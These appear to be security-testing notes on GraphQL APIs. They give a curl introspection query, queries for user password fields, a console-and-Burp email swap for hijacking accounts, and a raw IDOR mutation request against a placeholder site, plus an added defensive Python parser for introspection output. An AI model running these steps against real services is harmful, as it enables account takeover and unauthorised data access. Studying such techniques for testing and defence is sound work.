Basic Exploit
Against GraphQL you can run some basic attacks with POST requests carrying JSON, or use Burp Suite. The first step is an introspection query that lists every type in the schema:
curl -s {web}/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq .
You can copy the output and send it to the following website:
Exploring
Once you have the name of a type, you can query its fields with the following query, using "User" as the example type; the "name" field here belongs to the type's own field list:
{ __type(name: "User") { name fields { name } } }
You can go deeper still, requesting the fields themselves:
{ user { username password } }
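The following is an added example, not part of the original notes: it parses a constructed __schema introspection response, tells you whether introspection is enabled (a GraphQL endpoint that should not expose its schema in production), lists the non-built-in types with their fields, flags field names that look like secrets, and builds the follow-up __type query shown above. The sample response and the SENSITIVE_FIELDS list are assumptions made for the example.

```python
import json

# Constructed sample of a `{ __schema { types { name } } }` style response (not from the page).
SAMPLE_INTROSPECTION = json.dumps({
    "data": {"__schema": {"types": [
        {"kind": "OBJECT", "name": "Query", "fields": [{"name": "user"}]},
        {"kind": "OBJECT", "name": "User",
         "fields": [{"name": "username"}, {"name": "password"}]},
        {"kind": "SCALAR", "name": "String", "fields": None},
        {"kind": "OBJECT", "name": "__Type", "fields": [{"name": "name"}]},
    ]}}
})

# Assumed list of field names that should never be readable through the API.
SENSITIVE_FIELDS = {"password", "token", "secret", "ssn"}


def introspection_enabled(raw):
    """True when the response carries a schema instead of an error body."""
    body = json.loads(raw)
    return bool((body.get("data") or {}).get("__schema"))


def parse_introspection(raw):
    """Return {type_name: [field names]} for non-built-in types that have fields.
    Introspection meta types start with '__' and scalars have no fields; both are skipped."""
    types = json.loads(raw)["data"]["__schema"]["types"]
    schema = {}
    for t in types:
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        schema[t["name"]] = [f["name"] for f in t["fields"]]
    return schema


def find_sensitive_fields(schema):
    """Flag (type, field) pairs whose field name suggests a secret is exposed."""
    return sorted((t, f) for t, fields in schema.items()
                  for f in fields if f.lower() in SENSITIVE_FIELDS)


def type_query(type_name):
    """Build the __type follow-up query used to explore a single type."""
    return '{ __type(name: "%s") { name fields { name } } }' % type_name


if __name__ == "__main__":
    print("introspection enabled:", introspection_enabled(SAMPLE_INTROSPECTION))
    print("exposed secrets:", find_sensitive_fields(parse_introspection(SAMPLE_INTROSPECTION)))
```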
Other cases
User hijacking
You can hijack a user by changing the information from the browser console via HTML; first confirm your own information under Inspect > Console:
window.RailsData.current_organization.business_email = "AttackerEmail"
window.RailsData.user.email = "AttackerEmail"
Then, in a request intercepted with Burp, when adding members or working with e-mail addresses, change the e-mail in the POST body to the victim's.
A site should verify this; it should not allow the victim's account to be used.
IDOR
In this case an attacker was able to download the information for every CODE, which makes it possible to write a script that downloads the whole database.
POST /graphql HTTP/2
Host: VICTIMA.com
Content-Length: 388
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: */*
X-Auth-Token: AUTHTOKEN
Content-Type: application/json
Origin: VICTIMA.com
Referer: VICTIMA.com/CODE/edit // this was on the "edit" page
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
{"operationName":"NombreOperacion","variables":{"structured_scope_id":"HASH-relacionado a /code/edit"},"query":"mutation NombreOperacion($structured_scope_id: ID!) {\n archiveStructuredScope(input: {structured_scope_id: $structured_scope_id}) {\n was_successful\n structured_scope {\n id\n archived_at\n __typename\n }\n __typename\n }\n}\n"}